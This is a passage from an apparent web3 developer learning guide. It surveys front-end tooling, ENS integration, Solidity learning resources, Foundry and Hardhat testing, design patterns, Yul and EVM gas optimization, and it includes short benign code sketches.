[Next.js](https://nextjs.org) is a React framework that enables server-side rendering and static site generation, does smart bundling and route pre-fetching, and a lot more. Next.js is able to heavily optimize your websites by only loading what you need on demand instead of loading the entire site up front. It also allows for a much better experience with creating API routes thanks to its file-system routing feature, it optimizes images, it has TypeScript support, it has built-in support for internationalized (i18n) routing, and a lot more.
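For a feel of the file-system API routes, here is a hedged sketch of a `pages/api/block.ts` route that proxies a JSON-RPC `eth_blockNumber` call; the `RPC_URL` endpoint is an assumption, and a Node runtime with a global `fetch` (Node 18+) is assumed:

```ts
// Sketch: a Next.js API route that returns the latest block number from an RPC node.
import type { NextApiRequest, NextApiResponse } from "next";

const RPC_URL = process.env.RPC_URL ?? "https://rpc.example.com"; // hypothetical endpoint

export default async function handler(req: NextApiRequest, res: NextApiResponse) {
  const rpcResponse = await fetch(RPC_URL, {
    method: "POST",
    headers: { "Content-Type": "application/json" },
    body: JSON.stringify({ jsonrpc: "2.0", id: 1, method: "eth_blockNumber", params: [] }),
  });
  const { result } = await rpcResponse.json(); // hex string, e.g. "0xf4240"
  res.status(200).json({ latestBlock: parseInt(result, 16) });
}
```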
**Learning resources:**
- [Next.js documentation](https://nextjs.org/docs)
- [awesome-nextjs](https://github.com/unicodeveloper/awesome-nextjs)
#### Moralis
[Moralis](https://moralis.io) is a web3 development platform that helps abstract away the pain of having to build all the backend infrastructure needed to run web3 applications from scratch. Moralis provides an easy-to-use API that lets you fetch any data that you want from various blockchains, handles web3 user authentication, allows you to listen to smart contract events in real time, gives you access to historical data, has support for cloud functions, and much more. If you've never worked with blockchains it is the best way to get onboarded and start building web3 applications, as the Moralis SDK is intuitive to use for anyone that has experience with JavaScript/TypeScript.
**Learning resources**
- [Moralis documentation](https://docs.moralis.io/moralis-server/getting-started)
- [Moralis YT channel](https://www.youtube.com/c/MoralisWeb3)
#### Web3 libraries
[Ethers.js](https://docs.ethers.io/) is one of the most popular libraries for interacting with the Ethereum blockchain and its ecosystem. Smart contracts that are deployed on the Ethereum blockchain have functions that can be called externally by any other account on Ethereum, be it an externally owned account (EOA = user wallet) or another smart contract. Many of these functions require certain parameters to be fed into them, and they often rely on external state like token prices on the blockchain, the balances of the user's wallet, and more. Ethers.js is what allows a user interface to call these functions: users input information in the frontend of your application, that information is put into the function call of the smart contract, and after the transaction is broadcast the EVM will try to execute the call; if every check inside of the function passes it will execute, otherwise the transaction will revert.
Ethers.js is currently the most popular Ethereum library among developers, but there are alternatives like web3.js, web3.py, Brownie, and many others. The second most popular framework is web3.js and it is the Ethereum JavaScript library that has been around the longest. For a comparison of ethers.js and web3.js read [this article](https://moralis.io/web3-js-vs-ethers-js-guide-to-eth-javascript-libraries/) written by the Moralis developer team.
**Learning resources**
- [ethers.js documentation](https://docs.ethers.io/)
[Web3.js](https://web3js.readthedocs.io/) is a collection of libraries that allow you to interact with a local or remote Ethereum node using HTTP, IPC, or WebSocket. With it you can retrieve user accounts, send transactions, interact with smart contracts, and more.
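For comparison with the ethers.js snippets above, the same kind of balance query looks like this with web3.js (the RPC endpoint is again an assumption):

```ts
// Sketch: querying an account's ETH balance with web3.js v1.
import Web3 from "web3";

const web3 = new Web3("https://rpc.example.com"); // hypothetical endpoint

async function printBalance(address: string) {
  const wei = await web3.eth.getBalance(address); // returned as a string denominated in wei
  console.log(`${web3.utils.fromWei(wei, "ether")} ETH`);
}
```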
**Learning resources**
- [web3.js documentation](https://web3js.readthedocs.io/en/v1.7.1/getting-started.html)
#### Design
As a front-end developer, you need to focus on how your application looks and how it feels to use it. A big part of that is design: before building a website you should prototype how you want it to look, how your users will interact with your application, how that fits the use case of your application and what you want to accomplish with it, and how to make it so that your users enjoy using it. UI/UX is a specialization of its own, but every front-end developer should have strong foundations in it regardless. Most big teams have designers who prototype applications using tools like Figma, Framer Motion, and various other tools. As a front-end developer, your task is to turn those designs into functioning code, hook all of the components up to the necessary APIs and databases, and implement the functionality of the application.
One of the most popular tools to prototype and design websites is Figma, so every FE developer should know how to use the application.
**Learning resources**
- [freeCodeCamp Figma YT course](https://youtu.be/jwCmIBJ8Jtc)
#### Web3 templates
When you are building web3 applications you usually start with a template. A template is just a group of libraries, pre-built user interfaces, and other tooling that together create a favorable environment for building your application. A lot of the initial hard work of setting up a project can be reused across projects to save time and effort on building redundant infrastructure. Many web3 templates have support for smart contracts out of the box, which is what you'll be interacting with most of the time as a front-end developer. It is good to know the basics of smart contracts and to understand how to get a contract instance from the ABI so you can call its methods within your user interface. That's the biggest overhead when building in web3 compared to being a frontend developer in web2, where you only have to care about fetching data from REST or GraphQL APIs.
You can build your own templates depending on your needs, or modify already existing ones. Popular web3 templates include:
- [moralis-starters](https://docs.moralis.io/moralis-server/getting-started/boilerplate-projects)
- [scaffold-eth](https://github.com/austintgriffith/scaffold-eth)
- [create-eth-app](https://github.com/paulrberg/create-eth-app)
#### Tooling
As a developer, there are many tools you'll use to make building applications easier and more efficient, to collaborate on projects with other people, to manage dependencies, and much more. This is a short section on different tooling you'll find yourself using regularly.
**Package management**
If you've gotten this far in the front-end specialization you've certainly had to install packages like React, Next.js, tailwind.css, ethers.js, and many others. The most popular package managers in the JavaScript ecosystem are `npm` and `yarn`. Package managers allow you to keep track of which versions of which external code libraries your application uses as well as how the project's code is structured, how to run different tests, how to run your program, and various other miscellaneous tasks.
As you build more complex applications it is good to learn the depths of your package manager, how to structure `package.json` files, how to write scripts that automate the boring stuff, how to set up a CI/CD pipeline (we'll talk about this in a bit), and more.
- [Package management basics](https://developer.mozilla.org/en-US/docs/Learn/Tools_and_testing/Understanding_client-side_tools/Package_management)
- [npm](https://www.npmjs.com/)
- [yarn](https://yarnpkg.com/)
**Styling/Animation**
There are many CSS libraries and frameworks which modify the way in which you write CSS. There are libraries that allow you to write CSS within JavaScript, component libraries for React which have a lot of the styling done for you, animation libraries, and more. I'll mention a few of the most popular ones, feel free to suggest changes as I'm not an expert in the area.
- [styled-components](https://www.styled-components.com/) (CSS in JS)
- [Tailwind.css](https://tailwindcss.com/) (CSS framework)
- [Framer Motion](https://www.framer.com/motion/) (Animations framework)
- [Chakra UI](https://chakra-ui.com/) (component library)
- [Material UI](https://mui.com/) (component library)
- [Next UI](https://nextui.org) (component library)
- [Sass](https://sass-lang.com/) (CSS pre-processor)
- [PostCSS](https://postcss.org/) (CSS pre-,post-processor)
- [awesome-CSS](https://github.com/awesome-css-group/awesome-css) (CSS learning repo)
**Linting/Formatting**
A linter is a static code analysis tool used to flag programming errors, bugs, stylistic errors, and suspicious constructs, while a code formatter makes sure that the code you write has a homogeneous style and abides by the formatting rules of a specific programming language (e.g. [PEP8](https://www.python.org/dev/peps/pep-0008/) for Python). When you're writing code, it's easy to miss a space, a tab, a colon, or an opening or closing bracket, or to write code with inconsistent styling. That's where linters and formatters come in handy: they automate the task and can be configured to run on save and on commit, so that badly styled code never gets into production or into a public repo. The most popular choices are:
- [Eslint](https://eslint.org/)
- [Prettier](https://prettier.io/)
**CI/CD**
CI/CD stands for continuous integration / continuous deployment: a set of tools, usually hosted in the cloud, that create automated processes which execute whenever a change is made to the codebase, so that the production servers running your application get automatically updated with the newly pushed code. These pipelines can also run tests on the code before it gets pushed into production; if the tests fail, the commit or update will not go through and collaborators will get notified. Once projects become bigger and have large teams of contributors, a solid CI/CD pipeline is very important to maximize the security and correctness of the code being pushed into production. Examples of popular CI/CD tooling are:
- [GitHub Actions](https://github.com/features/actions)
- [CircleCi](https://circleci.com/)
- [Husky](https://typicode.github.io/husky/#/)
**Testing**
A key part of development is mitigating how many bugs end up inside your application. To ensure that the code behaves as intended, we write [unit tests](https://en.wikipedia.org/wiki/Unit_testing), [integration tests](https://en.wikipedia.org/wiki/Integration_testing), or even [end-to-end tests](https://www.browserstack.com/guide/end-to-end-testing). Each kind of test focuses on a different part of the application lifecycle. Modern tooling like Cypress allows you to simulate all possible states of your application and simulate user flows; you can even record user session tests as if you were recording a real user going through your website. In web3 you will also write integration tests for smart contract interactions. You can test smart contracts using libraries like [Foundry](https://github.com/gakonst/foundry), [Hardhat](https://hardhat.org/) or [Truffle](https://trufflesuite.com/). Most of these tests will be written by a smart contract or full-stack developer; however, as a frontend developer, you need to test how the interactions with the contracts influence the flow of the user interface of your application. You can write such tests in JavaScript/TypeScript with ethers.js and couple them with Cypress to build complex test suites (see the sketch after the list below). The web3 app development lifecycle usually goes from locally deployed smart contracts and front-end, to testnets (live network environments with non-valuable assets), to mainnet (not necessarily Ethereum mainnet; it can be an L2 like Arbitrum, a sidechain like Polygon PoS, etc). On the smart contract side, development teams hire external security auditors to verify that the contracts are secure to use; we will cover this in depth in the [smart contract development section](#smart-contract-development).
- [Cypress](https://www.cypress.io/)
- [Jest](https://jestjs.io/)
- [Mocha](https://mochajs.org/)
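Here is a minimal integration-test sketch (Mocha + Chai + ethers.js v5) against a Counter contract deployed on a local node such as Hardhat or Anvil; the contract address is a placeholder for wherever your local deployment script put it:

```ts
// Sketch: integration test against a local node at http://localhost:8545.
// Assumes Mocha globals (describe/it) are available, e.g. via @types/mocha.
import { expect } from "chai";
import { ethers } from "ethers";

const COUNTER_ADDRESS = "0x0000000000000000000000000000000000000000"; // placeholder address
const COUNTER_ABI = ["function get() view returns (uint256)", "function inc()"];

describe("Counter", () => {
  it("increments by one", async () => {
    const provider = new ethers.providers.JsonRpcProvider("http://localhost:8545");
    const signer = provider.getSigner(0); // first unlocked account on the local node
    const counter = new ethers.Contract(COUNTER_ADDRESS, COUNTER_ABI, signer);

    const before = await counter.get();
    await (await counter.inc()).wait();
    const after = await counter.get();

    expect(after.sub(before).toNumber()).to.equal(1);
  });
});
```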
**ENS integration**
[ENS domains](https://ens.domains/) are human-readable domains for Ethereum addresses. The registrar for these domains is fully on-chain, and the protocol is decentralized and governed by a DAO. ENS domains serve as an on-chain identity mechanism which many Ethereum users use to express themselves on-chain and to display information about themselves through ENS profile metadata, containing contact information like email, Twitter, or Discord, links to websites, a profile picture (NFT image metadata), and more. As a web3 front-end developer you can tap into this registrar and display users' information once they've connected to your application with their web3 wallet.
The best way to get started with ENS is [their official documentation](https://docs.ens.domains/), where you can get a general understanding of the ENS protocol. For integrating ENS into your dapp, visit [this section](https://docs.ens.domains/dapp-developer-guide/ens-enabling-your-dapp). You need to perform 3 steps in order to support ENS within your application (a minimal resolution sketch follows the list):
1. [Resolve ENS names](https://docs.ens.domains/dapp-developer-guide/resolving-names)
2. [Support reverse resolution](https://docs.ens.domains/dapp-developer-guide/resolving-names#reverse-resolution)
3. [Let users manage their ENS names](https://docs.ens.domains/dapp-developer-guide/managing-names)
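For steps 1 and 2, ethers.js exposes forward and reverse resolution directly on the provider; here is a minimal sketch against Ethereum mainnet:

```ts
// Sketch: forward resolution (name -> address) and reverse resolution (address -> name).
import { ethers } from "ethers";

const provider = ethers.getDefaultProvider("mainnet");

async function resolve(nameOrAddress: string) {
  if (nameOrAddress.endsWith(".eth")) {
    const address = await provider.resolveName(nameOrAddress); // null if the name isn't set
    console.log(`${nameOrAddress} -> ${address}`);
  } else {
    const name = await provider.lookupAddress(nameOrAddress); // null if no reverse record exists
    console.log(`${nameOrAddress} -> ${name}`);
  }
}
```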
If you are interested in how the on-chain parts of ENS work, check out the [smart contract development section](#smart-contract-development).
#### Further learning and development
By now you have learned a solid technology stack that can enable you to build all kinds of user interfaces for web3 apps. In order to really ingrain these technologies, you need to build pet projects or join a team full-time; even if you only know a few of them you can join a team and get upskilled there, as your learning will be supercharged by more experienced coworkers who will act as mentors most of the time. The front-end development landscape is constantly evolving; new technologies will come and go, and it is in your best interest to look at trends in the industry and adopt them once there are clear signs of them being adopted. You will keep improving your technology stack over time, especially as you become more senior and are able to reason about why you want to use one tool over another and how it fits the needs of the applications that you are building.
Build, Build, Build! Try creating small projects that implement ideas you come up with and practice the technologies you want to master. Also, don't be shy to ask questions to other web3 developers, and form learning groups with your friends, or other industry members.
Also, read over the [Getting a Job](#getting-a-job) and [Mastery](#mastery) sections of this guide to get more insight into soft skills which are useful to learn to grow as a developer.
### Smart contract development
Writing decentralized applications (Dapps) requires knowing how to write smart contracts as they are pieces of code that live on blockchains that can be executed inside of virtual machines. To write contracts you need to learn the programming languages that are able to compile to a target that the virtual machine can understand. In the case of the Ethereum blockchain, we have the EVM which has a set of operations it supports (a.k.a OPCODES). The most popular language for writing smart contracts on Ethereum is Solidity, which is a statically typed, object-oriented high-level programming language that takes inspiration from C++, Python, and JavaScript. With Solidity, you can program logic that executes inside of the EVM and the result of its operations is stored on the blockchain forever. The state of these applications is easily accessible from a full-node or from a third-party data indexing platform. The goal of smart contract developers is to create secure applications which perform a certain action, for example, a contract that allows for users to swap tokens, to buy and sell NFTs, to vote on proposals, etc.
There are many different stages in the smart contract development lifecycle: experimentation, iteration, testing, auditing, testnet deployment, and mainnet deployment. There are also different sets of best practices that developers and production teams adopt in order to mitigate the security and economic risks of their applications. Another important part of writing smart contracts on Ethereum or Ethereum L2s is optimizing the contracts to minimize the amount of gas they consume. Since block space on Ethereum and L2s is limited, there needs to be a fee mechanism to avoid state bloat, which assigns a fixed gas cost to each operation executed by the respective VM. That means that the more complex a smart contract is, the more expensive it will be to deploy and for users to use. There are various design patterns that optimize the code to consume the least amount of gas possible while remaining readable and secure.
#### Solidity
Solidity is by far the most popular language to write smart contracts at the moment as the EVM is the most widely adopted virtual machine out there. Not only is it used in Ethereum's execution layer, but many alt L1s and L2s on Ethereum use the EVM as their virtual machine since there's a fairly mature development ecosystem. In order to first learn Solidity, we'll go over a few simple courses that explain the principles of the language, and as we progress further we will talk about design patterns, testing, security, oracles, and more.
[CryptoZombies](https://cryptozombies.io/en/course/) is an interactive web application that teaches you the basics of Solidity through a fun development game. It teaches you how to create a contract, the data types that Solidity supports, how to write methods, how to manage objects, events, inheritance, memory management, interfaces, modifiers, and more. By the time you finish the first three short courses, you'll be able to read and write Solidity code. An alternative to CryptoZombies which is in video form is the [Solidity playlist](https://www.youtube.com/playlist?list=PLO5VPQH6OWdVQwpQfw9rZ67O6Pjfo6q-p) from [Smart Contract Programmer](https://www.youtube.com/channel/UCJWh7F3AFyQ_x01VKzr9eyA) on YouTube. This one is a bit better as it covers Solidity 0.8.0 which is a fairly recent version.
After we finish the course with the basics, we'll move on to building small projects implementing various protocols, applications, and cryptographic primitives through the [scaffold-eth](https://github.com/scaffold-eth/scaffold-eth) challenges that appear in [this thread](https://twitter.com/austingriffith/status/1483834810359377923?s=20&t=lkXzcAH2cT5xf7btyMAs0A). Scaffold-eth is a web3 development template built by [Austin Griffith](https://twitter.com/austingriffith) and open-source contributors which abstracts away the backend of your app and creates a front-end interface for interacting with the smart contracts that you write. We will start with the [Ethereum Speed Run](https://speedrunethereum.com/) challenges in the thread mentioned above, and continue by building more complex applications like a [signature-based multisig](https://github.com/scaffold-eth/scaffold-eth-examples/tree/meta-multi-sig), an [app that uploads images to IPFS](https://github.com/scaffold-eth/scaffold-eth/tree/image-upload-ipfs), and more.
Another great way to learn Solidity is to look through existing, well-written code, for example [Solidity by Example](https://solidity-by-example.org/).
Now that you've been writing more and more complex smart contracts it is a good idea to start looking at other people's code to get a feel for how they implement different features, how they structure code, what designs and patterns they use, how they optimize for gas, and a lot more.
There are many techniques that you'll pick up along your journey to make your contracts more resource-effective and gas-optimized, so that your users don't need to spend as much money to use your applications.
A good example of well-made smart contracts at the intermediate level is [Miguel Piedrafita](https://twitter.com/m1guelpf)'s [lil-web3](https://github.com/m1guelpf/lil-web3/tree/main/src) contracts. They are simple implementations of popular protocols and applications, and they come with tests written using Foundry, which we will cover shortly. Take a look at how the comments are written, how events and errors are used, how the code is structured, which gas minimization techniques he employs, and try to understand the design of each protocol implementation. Implementing your own versions of well-known applications and protocols is a great way to improve at Solidity, as you'll learn a lot about the development process you'll go through once you are writing production code at a company or DAO.
**Threads that talk about getting really good at Solidity**
- [Tips from Emilio Frangella @ Aave](https://twitter.com/The3D_/status/1485308693935763458?s=20&t=s2cbKFxvZ3tpjkFqcbyLfA)
- [Tips from @freddycoen](https://twitter.com/freddycoen/status/1485572733706682368)
- [Tips for non-beginners from @0xCacti](https://twitter.com/0xcacti/status/1485079302601207810?s=20&t=Iu2DlMREKnTAzGzifVZLMA)
- [Tips from @transmissions11](https://twitter.com/transmissions11/status/1485159010210770946?s=20&t=Iu2DlMREKnTAzGzifVZLMA)
Once you've gone through all of the above, the best thing you can do to learn advanced Solidity is to study what the best codebases look like. Look at how they structure their projects, what gas optimizations they use, which Solidity patterns they employ, how they write tests, how they create interfaces, how they handle events and errors, what libraries/dependencies they use (if any), etc.
Examples of great codebases:
- [Uniswap v2](https://github.com/Uniswap/v2-core) / [Uniswap v3](https://github.com/Uniswap/v3-core)
- [Gnosis Safe](https://github.com/gnosis/safe-contracts)
- [Compound finance](https://github.com/compound-finance/compound-protocol)
- [Zora v3](https://github.com/ourzora/v3)
- [Rari Capital](https://github.com/Rari-Capital/vaults)
- [Ribbon Finance](https://github.com/ribbon-finance/ribbon-v2/tree/master/contracts)
- [AAVE](https://github.com/aave/aave-protocol)
- [SushiSwap](https://github.com/sushiswap/sushiswap)
#### Testing
Testing smart contracts is an essential part of the development process, as it ensures that the code you write behaves as intended and is secure against various technical and economic exploits. Different teams use different libraries; each has its pros and cons, and in some cases they can be used in a complementary fashion. We will cover the most popular ones among top-tier developers as well as the most commonly used ones like Hardhat and Truffle.
Opinionated recommendations: Foundry and Hardhat
**Foundry**
[Foundry](https://github.com/gakonst/foundry) is the hottest library in the Ethereum development landscape. It was originally built by Georgios Konstantopoulos, one of the most highly respected developers in the entire Ethereum ecosystem. Georgios is currently the CTO at Paradigm, and part of his job is building tools for developers that will be used to create the applications of the future.
Foundry is composed of two parts: Forge and Cast.
- **Forge:** Forge is a fast and flexible Ethereum testing framework, inspired by Dapptools.
- **Cast:** Swiss army knife for interacting with EVM smart contracts, sending transactions, and getting chain data.
The library is written in Rust, which is a systems-level programming language that has memory safety, borrow checking, performant concurrency, and many other features which are making it one of the favorite languages used by developers across all fronts. Many popular libraries are being written in Rust, popular compiler targets like WASM are supported by Rust, a lot of Ethereum developer tooling is built using Rust or is refactoring their infrastructure to use Rust. It is a very exciting trend in blockchain development and many developers are learning the language to be able to contribute to these cool pieces of software. The best way to get started with Rust is [The Rust Book](https://doc.rust-lang.org/book/) and the [Rustlings repo](https://github.com/rust-lang/rustlings/).
The reason Foundry is gaining so much popularity, and why it is so important, is that Solidity tests should be written in Solidity, not in JavaScript. It is very hard to master two different languages at once, and Solidity developers shouldn't be forced to learn JavaScript just to be able to test their smart contracts. Foundry's development environment is also becoming increasingly feature-rich. The main reason you might still reach for other toolkits is deployment, which Foundry does not yet support; for managing deployments, the standard toolkit is Hardhat. For testing, gas optimization reports, fuzzing, symbolic execution (hevm), etc., do use Foundry. A minimal Forge test sketch follows the resource list below. Good resources for learning and mastering Foundry are:
- [The Foundry Book](https://book.getfoundry.sh/) - Community sourced documentation
- [Tweet from @andreasbigger](https://twitter.com/andreasbigger/status/1500209878433894400?s=20&t=5HKeV0q_h3Z3QoRvlkO_hQ):
- Familiarize yourself w/ [Forge-cli](https://github.com/gakonst/foundry/blob/master/cli/README.md)
- Checkout some templates:
- [FrankieIsLost forge template](https://github.com/FrankieIsLost/forge-template)
- [ZeframLou forge template](https://github.com/ZeframLou/foundry-template)
- [AndreasBigger femplate](https://github.com/abigger87/femplate)
- Dive into repos using Foundry:
- [lil-web3](https://github.com/m1guelpf/lil-web3/)
- [n3rp](https://github.com/GrantStenger/n3rp)
- [zen](https://github.com/zkSoju/zen)
- [cloaks](https://github.com/abigger87/cloaks)
- [ethernaut-x-foundry](https://github.com/ciaranmcveigh5/ethernaut-x-foundry)
- [damn-vulnerable-defi-foundry](https://github.com/nicolasgarcia214/damn-vulnerable-defi-foundry)
- [Multicall](https://github.com/mds1/multicall)
- [Brockelmore's testing verbosity with forge-std](https://github.com/brockelmore/forge-std)
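To give a feel for what a Forge test looks like, here is a minimal sketch assuming the `forge-std` library; the `Counter` contract and the test names are illustrative only:

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.13;

import "forge-std/Test.sol";

// Hypothetical contract under test.
contract Counter {
    uint256 public count;

    function increment() external {
        count += 1;
    }
}

// Forge runs every function prefixed with `test` as a test case.
contract CounterTest is Test {
    Counter internal counter;

    function setUp() public {
        counter = new Counter();
    }

    function testIncrement() public {
        counter.increment();
        assertEq(counter.count(), 1);
    }

    // Fuzz test: Forge supplies random values for `x`.
    function testFuzzIncrement(uint8 x) public {
        for (uint256 i = 0; i < x; i++) {
            counter.increment();
        }
        assertEq(counter.count(), x);
    }
}
```

Running `forge test` compiles the project and executes both the unit test and the fuzz test against a local EVM.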
**HardHat**
[Hardhat](https://hardhat.org/) is the most widely used Ethereum development library across the ecosystem and is the standard in most production codebases like Aave, Uniswap, and many others. Usually, all the deploy scripts, migration files, automation scripts, etc. are written using Hardhat and its tooling suite. It is a JavaScript library (with TypeScript support). Recently the Hardhat team announced that they are moving their infrastructure to Rust, as most of the tooling ecosystem is adopting it due to its performance and security.
**Truffle Suite**
[Truffle Suite](https://trufflesuite.com/) is a suite of tools developed by Consensys to locally test smart contracts by deploying them on a local instance of the Ethereum blockchain, mocking user addresses using the Ganache library, writing tests using Truffle, and creating on-chain data pipelines for user interfaces using Drizzle. It was one of the first complete Ethereum developer tooling ecosystems to be released, but it has fallen out of favor in recent years as libraries like Hardhat overtook it.
**Dapptools**
[Dapptools](https://github.com/dapphub/dapptools) is a suite of Ethereum focused CLI tools following the Unix design philosophy, favoring composability, configurability, and extensibility.
There are 4 key elements in Dapptools:
- **dapp** - All you need Ethereum development tool. Build, test, fuzz, formally verify, debug & deploy solidity contracts.
- **seth** - Ethereum CLI. Query contracts, send transactions, follow logs, slice & dice data.
- **hevm** - Testing-oriented EVM implementation. Debug, fuzz, or symbolically execute code against local or mainnet state.
- **ethsign** - Sign Ethereum transactions from a local Keystore or hardware wallet.
A cool innovation from Dapptools was hevm, an EVM implementation written in Haskell (a functional programming language) that allows developers to symbolically execute Solidity code and formally verify the results of the resulting bytecode (opcode operations). This feature was later adopted by Foundry, along with many others that Dapptools provided first.
#### Design patterns
Once you're comfortable with writing more and more complex contracts, and perhaps with looking at the front-end code and how it interacts with the smart contracts, you'll start getting a feel for how smart contracts are designed from a higher-level view. There are certain designs and patterns which are commonplace, things like the approve pattern for tokens, and more. At this point, it is a good idea to start thinking more about the overall architecture of your code and the structure it will take to efficiently implement the functionality you want to enable.
There are common patterns employed in smart contract development; this [solidity-patterns](https://github.com/fravoll/solidity-patterns) repo implements some of them.
Since the EVM is such a constrained environment, where each additional operation adds gas costs to the execution of the smart contract, developers try to build contracts that are as resource-efficient as possible whilst also maximizing readability and security. Since blockchains are a very adversarial environment where mistakes in a smart contract can lead to fund drains (rugs) and exploits, smart contracts can be considered mission-critical software, and many developers take inspiration from the guidelines written for other mission-critical software, such as NASA's, which are responsible for the lives of astronauts going to space. These development principles are guidelines that help optimize a codebase for maximum security through the adoption of a standardized procedure and developer mindset. One classic example, the checks-effects-interactions pattern, is sketched below.
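A minimal sketch of the checks-effects-interactions pattern, which orders a function so that external calls happen only after internal state has been updated (the vault below is hypothetical and purely illustrative):

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.13;

contract EtherVault {
    mapping(address => uint256) public balances;

    function deposit() external payable {
        balances[msg.sender] += msg.value;
    }

    function withdraw(uint256 amount) external {
        // 1. Checks: validate inputs and state.
        require(balances[msg.sender] >= amount, "insufficient balance");

        // 2. Effects: update internal state before any external call.
        balances[msg.sender] -= amount;

        // 3. Interactions: the external call goes last, so a reentrant
        //    call sees the already-updated balance.
        (bool ok, ) = msg.sender.call{value: amount}("");
        require(ok, "transfer failed");
    }
}
```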
**ENS integration**
We mentioned how to integrate ENS domain names into your dapp within the [front end development section](#front-end-development), but as a smart contract developer you can also [resolve ENS domain names on-chain](https://docs.ens.domains/contract-developer-guide/resolving-names-on-chain), [write your own resolver](https://docs.ens.domains/contract-developer-guide/writing-a-resolver) which implements [EIP137](https://github.com/ethereum/EIPs/issues/137) or even [write your own registrar](https://docs.ens.domains/contract-developer-guide/writing-a-registrar).
#### Specialized languages
There are various programming languages that can be compiled into EVM bytecode. There are high-level programming languages such as Solidity, Vyper, or Fe, but there's also an intermediate programming language often used in gas-optimized contracts called Yul, and as a developer you can also write EVM assembly using the opcodes directly. A common technique for gas minimization is writing Solidity code, inspecting the resulting EVM assembly, and comparing the gas cost of different implementations in order to make the contract as gas-efficient as possible.
- **Yul**
[Yul](https://docs.soliditylang.org/en/v0.8.12/yul.html) is an intermediate-level programming language that can compile into EVM bytecode. From the Solidity documentation:
"The design of Yul tries to achieve several goals:
- Programs written in Yul should be readable, even if the code is generated by a compiler from Solidity or another high-level language.
- Control flow should be easy to understand to help in manual inspection, formal verification, and optimization.
- The translation from Yul to bytecode should be as straightforward as possible.
- Yul should be suitable for whole-program optimization.
In order to achieve the first and second goals, Yul provides high-level constructs like `for` loops, `if` and `switch` statements and function calls. These should be sufficient for adequately representing the control flow for assembly programs. Therefore, no explicit statements for `SWAP`, `DUP`, `JUMPDEST`, `JUMP` and `JUMPI` are provided, because the first two obfuscate the data flow and the last two obfuscate control flow. Furthermore, functional statements of the form `mul(add(x, y), 7)` are preferred over pure opcode statements like `7 y x add mul` because, in the first form, it is much easier to see which operand is used for which opcode."
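In practice you will most often meet Yul as the dialect used inside Solidity's inline `assembly` blocks. A small illustrative sketch (contract and function names are hypothetical):

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.13;

contract YulExample {
    // Functionally identical to `a + b`, but written with the functional
    // opcode style described in the quote above.
    function addYul(uint256 a, uint256 b) external pure returns (uint256 result) {
        assembly {
            result := add(a, b)
        }
    }

    // A Yul `for` loop summing 1..n, showing the high-level control-flow
    // constructs Yul provides instead of raw JUMP/JUMPI opcodes.
    function sumYul(uint256 n) external pure returns (uint256 total) {
        assembly {
            for { let i := 1 } iszero(gt(i, n)) { i := add(i, 1) } {
                total := add(total, i)
            }
        }
    }
}
```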
- **EVM Assembly**
[EVM Assembly](https://docs.soliditylang.org/en/v0.8.12/assembly.html) can be written inside of inline Solidity statements with the `assembly` keyword. It allows for more fine-grained control over the resulting bytecode. Oftentimes the compiler is unable to optimize Solidity code well and so it results in unnecessary gas costs.
There's also an `unchecked` keyword in Solidity which disables the overflow and underflow checks from the compiler. These checks were introduced in Solidity 0.8.0 and were previously provided by OpenZeppelin's SafeMath library. The `unchecked` keyword is oftentimes used in places where the developer can guarantee that an overflow or underflow cannot occur, for example around loop counter increments, in order to save gas (see the sketch below).
Writing Yul or inline assembly can obfuscate the functionality of your code by making it less readable for other contributors/auditors and it can potentially introduce new risks as the Solidity compiler oftentimes performs various optimizations and security checks.
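The sketch below contrasts a default checked loop with one whose counter increment is wrapped in `unchecked`; the functions are hypothetical and only illustrate where the keyword is typically applied:

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.13;

contract GasExamples {
    // Sums an array using the default checked arithmetic from 0.8.0.
    function sumChecked(uint256[] calldata xs) external pure returns (uint256 total) {
        for (uint256 i = 0; i < xs.length; i++) {
            total += xs[i];
        }
    }

    // Same logic, but the loop counter increment is wrapped in `unchecked`.
    // `i` can never overflow here because it is bounded by `xs.length`,
    // so the compiler's overflow check is redundant and only costs gas.
    function sumUnchecked(uint256[] calldata xs) external pure returns (uint256 total) {
        for (uint256 i = 0; i < xs.length; ) {
            total += xs[i];
            unchecked {
                ++i;
            }
        }
    }
}
```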
Good toolkits for writing EVM Assembly:
- [etk](https://github.com/quilt/etk)
- [huffc](https://github.com/JetJadeja/huffc)
- and the aforementioned Yul intermediate language
#### EVM deep dive
Understanding the ins and outs of the EVM is crucial for building highly optimized applications, since each operation executed by the EVM has a gas cost attached to it and users pay that price for executing functions within the applications they use. There is, however, a compromise between readability and code optimization which needs to be taken into consideration. Techniques like bit shifting and bitmapping ([Hacker's Delight](https://github.com/lancetw/ebook-1/blob/master/02_algorithm/Hacker's%20Delight%202nd%20Edition.pdf) is a good book that covers bit manipulation in detail) can have a negative impact on readability and thus security, as other contributors and auditors may not be able to wrap their heads around these complex optimizations, or it would simply take too much time for them to do so. For code that actually goes into production, each project needs to assess how much it wants to optimize for gas savings over readability. Security usually comes first; however, there is still a set of well-known good practices that will let you save some gas, and if you do use gas optimization techniques, it is advisable to document them well with comments inside your Solidity contracts. Another important point is that as these technologies scale and developers become less constrained by the virtual machine executing smart contract bytecode, the need for optimizations becomes less pressing, and the compilers converting source code to machine code keep getting better at optimizing for performance and low cost. As technologies like L2s and data availability layers become mainstream, we may also see the emergence of new VM architectures that experiment with designs that do not require developers to work with low-level optimizations, as they will be highly performant and scalable. A small bitmapping sketch follows below.
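The sketch below packs 256 boolean flags into a single storage slot, one of the simplest forms of the bitmapping technique mentioned above; the contract is hypothetical and purely illustrative:

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.13;

// 256 flags in one uint256 slot instead of 256 separate bool slots,
// saving both storage writes and reads.
contract ClaimBitmap {
    uint256 private claimed; // bit i == 1 means index i has claimed

    function isClaimed(uint8 index) public view returns (bool) {
        return ((claimed >> index) & 1) == 1;
    }

    function setClaimed(uint8 index) external {
        claimed = claimed | (uint256(1) << index);
    }
}
```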
For a comprehensive EVM deepdive, I suggest these resources:
- [Ethereum Explained: The EVM](https://www.youtube.com/watch?v=kCswGz9naZg&ab_channel=JordanMcKinney)
- [The EVM Handbook](https://noxx3xxon.notion.site/noxx3xxon/The-EVM-Handbook-bb38e175cc404111a391907c4975426d)
- [EVM development starter kit](https://freddycoen.medium.com/evm-starter-kit-1790bcc992ef)
- Read Chapter 13 (EVM) of [The Ethereum Book](https://github.com/ethereumbook/ethereumbook/blob/develop/13evm.asciidoc)
